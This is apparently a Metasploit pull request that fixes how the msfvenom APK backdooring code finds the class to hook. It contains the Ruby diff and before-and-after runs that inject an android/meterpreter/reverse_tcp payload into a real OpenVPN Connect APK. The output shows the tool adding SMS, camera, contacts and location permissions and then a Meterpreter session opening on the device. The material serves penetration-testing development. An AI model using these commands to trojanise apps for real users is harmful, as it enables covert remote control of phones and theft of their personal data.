### PR TITLE
Msf::Payload::Apk: find_hook_point: Return full packagename.classname

### DIFF
--- a/lib/msf/core/payload/apk.rb
+++ b/lib/msf/core/payload/apk.rb
@@ -34,40 +34,64 @@ class Msf::Payload::Apk
     end
   end
 
-  # Find a suitable smali point to hook
-  def find_hook_point(amanifest)
-    package = amanifest.xpath("//manifest").first['package']
-    application = amanifest.xpath('//application')
-    application_name = application.attribute("name")
-    if application_name
-      application_str = application_name.to_s
-      unless application_str == 'android.app.Application'
-        return application_str
+  # Find a suitable smali point to hook.
+  # Returns the first suitable hook point.
+  #
+  # @param manifest [String] AndroidManifest.xml file contents
+  #
+  # @return [String] Full class name, for example: com.example.app.MainActivity
+  def find_hook_point(manifest)
+    return unless manifest
+
+    package = manifest.xpath('//manifest').first['package']
+
+    application = manifest.xpath('//application')
+    application_name = application.attribute('name').to_s
+    unless (application_name.blank? || application_name == 'android.app.Application')
+      unless application_name.include?('.')
+        application_name = '.' + application_name
       end
+      if application_name.start_with?('.')
+        application_name = package + application_name
+      end
+      return application_name
     end
-    activities = amanifest.xpath("//activity|//activity-alias")
+
+    activities = manifest.xpath('//activity|//activity-alias')
     for activity in activities
-      activityname = activity.attribute("targetActivity")
-      unless activityname
-        activityname = activity.attribute("name")
+      activity_name = activity.attribute('targetActivity').to_s
+      if activity_name.blank?
+        activity_name = activity.attribute('name').to_s
       end
+
+      next if activity_name.blank?
+
       category = activity.search('category')
-      unless category
-        next
-      end
+      next unless category
+
       for cat in category
-        categoryname = cat.attribute('name')
-        if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN')
-          name = activityname.to_s
-          if name.start_with?('.')
-            name = package + name
-          end
-          return name
+        category_name = cat.attribute('name').to_s
+        next unless (category_name == 'android.intent.category.LAUNCHER' || category_name == 'android.intent.action.MAIN')
+
+        unless activity_name.include?('.')
+          activity_name = '.' + activity_name
         end
+        if activity_name.start_with?('.')
+          activity_name = package + activity_name
+        end
+
+        return activity_name
       end
     end
+
+    nil
   end
 
+  # Read AndroidManifest.xml file.
+  #
+  # @param manifest_file [String] Path to AndroidManifest.xml file
+  #
+  # @return [Nokogiri::XML] AndroidManifest.xml file contents
   def parse_manifest(manifest_file)
     File.open(manifest_file, "rb"){|file|
       data = File.read(file)
@@ -282,22 +306,21 @@ class Msf::Payload::Apk
 
     print_status "Locating hook point..\n"
     hookable_class = find_hook_point(amanifest)
-    smalifile = "#{tempdir}/original/smali*/" + hookable_class.gsub(/\./, "/") + ".smali"
-    smalifiles = Dir.glob(smalifile)
-    for smalifile in smalifiles
-      if File.readable?(smalifile)
-        hooksmali = File.read(smalifile)
-        break
-      end
+    if hookable_class.blank?
+      raise 'Unable to find hookable class in AndroidManifest.xml'
     end
 
-    unless hooksmali
-      raise RuntimeError, "Unable to find hook point in #{smalifile}\n"
+    hookable_class_filename = hookable_class.to_s.gsub('.', '/') + '.smali'
+    hookable_class_filepath = "#{tempdir}/original/smali*/#{hookable_class_filename}"
+    smalifile = Dir.glob(hookable_class_filepath).select { |f| File.readable?(f) && !File.symlink?(f) }.flatten.first
+    if smalifile.blank?
+      raise "Unable to find class file: #{hookable_class_filepath}"
     end
 
+    hooksmali = File.read(smalifile)
     entrypoint = 'return-void'
-    unless hooksmali.include? entrypoint
-      raise RuntimeError, "Unable to find hookable function in #{smalifile}\n"
+    unless hooksmali.include?(entrypoint)
+      raise "Unable to find hookable function in #{smalifile}"
     end
 
     # Remove unused files
@@ -311,6 +334,7 @@ class Msf::Payload::Apk
     classes['MainService'] = Rex::Text::rand_text_alpha_lower(5).capitalize
     classes['MainBroadcastReceiver'] = Rex::Text::rand_text_alpha_lower(5).capitalize
     package_slash = package.gsub(/\./, "/")
+
     print_status "Adding payload as package #{package}\n"
     payload_files = Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/*.smali")
     payload_dir = "#{tempdir}/original/smali/#{package_slash}/"


### PR DESCRIPTION
Ensure the `find_hook_point` method always returns the full class name including the package name.

Most APK files define an application name including the full package name in `AndroidManifest.xml`, like this:

```xml
<application android:name="com.nvidia.tegrazone.TegraZoneApplication" [...]
```

When using a template APK file with msfvenom, the `backdoor_apk` method uses the full application name (including package name) when locating the smali class file (after converting `.` to `/`) like so:

```
com/nvidia/tegrazone/TegraZoneApplication.smali
```

However, some APK files define an application name using only the class name without the full package name. For example:

```xml
<application android:name=".OpenVPNApplication" [...]
```

```xml
<application android:name="TodoistApplication" [...]
```

`backdoor_apk` the attempts to locate the smali class file like so:

```
/OpenVPNApplication.smali
```

`Dir.glob` is used to find the class file in `./smali*/` directories within the decompiled APK directory; however, the search is not performed recursively, which prevents locating the smali file when short package names are used, as the class file is several directories deep.

This PR resolves this issue by ensuring that `find_hook_point` returns the full package name and class name.

It also checks `!File.symlink?` to prevent following symlinks - an oversight in the original code.

It also ensures `find_hook_point` returns `nil` in the event that no hook points are found. Previously it would incorrectly and unintentionally return a Nokogiri::XML object which lead to confusing XML error messages while trying to locate the smali class file - an oversight in the original code.

Fixes #13533. The issue originally described an issue when using the [Netflix apk](https://netflixhelp.s3.amazonaws.com/netflix-4.16-15235-release.apk) as a template. This PR fixes this issue, but another issue prevents rebuilding the Netflix apk.

Instead, this PR was tested using [OpenVPN Connect – Fast & Safe SSL VPN Client 1.1.16 (arm64-v8a + arm + arm-v7a) (nodpi) (Android 4.0+).apk](https://www.apkmirror.com/apk/openvpn/openvpn-connect/openvpn-connect-1-1-16-release/openvpn-connect-1-1-16-android-apk-download/download/) from apkmirror. Use at own risk.


# Before

```
# ./msfvenom -x 'OpenVPN Connect – Fast & Safe SSL VPN Client 1.1.16 (arm64-v8a + arm + arm-v7a) (nodpi) (Android 4.0+).apk'  -p android/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=4444 -o asdf.apk 
/usr/lib/ruby/2.7.0/timeout.rb:50: warning: already initialized constant Timeout::THIS_FILE
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:53: warning: previous definition of THIS_FILE was here
/usr/lib/ruby/2.7.0/timeout.rb:51: warning: already initialized constant Timeout::CALLER_OFFSET
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:54: warning: previous definition of CALLER_OFFSET was here
Using APK template: OpenVPN Connect – Fast & Safe SSL VPN Client 1.1.16 (arm64-v8a + arm + arm-v7a) (nodpi) (Android 4.0+).apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
Error: Unable to find hook point in /tmp/d20220318-763822-b0zsjd/original/smali*//OpenVPNApplication.smali
```

# After

```
# ./msfvenom -x 'OpenVPN Connect – Fast & Safe SSL VPN Client 1.1.16 (arm64-v8a + arm + arm-v7a) (nodpi) (Android 4.0+).apk'  -p android/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=4444 -o asdf.apk 
/usr/lib/ruby/2.7.0/timeout.rb:50: warning: already initialized constant Timeout::THIS_FILE
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:53: warning: previous definition of THIS_FILE was here
/usr/lib/ruby/2.7.0/timeout.rb:51: warning: already initialized constant Timeout::CALLER_OFFSET
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:54: warning: previous definition of CALLER_OFFSET was here
Using APK template: OpenVPN Connect – Fast & Safe SSL VPN Client 1.1.16 (arm64-v8a + arm + arm-v7a) (nodpi) (Android 4.0+).apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package net.openvpn.openvpn.lqzcf
[*] Loading /tmp/d20220318-763183-qj9zz0/original/smali/net/openvpn/openvpn/OpenVPNApplication.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.WAKE_LOCK"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.CAMERA"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20220318-763183-qj9zz0/output.apk
[*] Aligning /tmp/d20220318-763183-qj9zz0/output.apk
[*] Signing /tmp/d20220318-763183-qj9zz0/aligned.apk with apksigner
Payload size: 2340848 bytes
Saved as: asdf.apk
```

```
msf6 exploit(multi/handler) > 
[*] Sending stage (78153 bytes) to 192.168.200.135
[*] Meterpreter session 4 opened (192.168.200.130:4444 -> 192.168.200.135:33148 ) at 2022-03-18 05:06:34 -0400

msf6 exploit(multi/handler) > 
msf6 exploit(multi/handler) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: u0_a154
meterpreter > pwd
/data/user/0/net.openvpn.openvpn/files
meterpreter > 
```

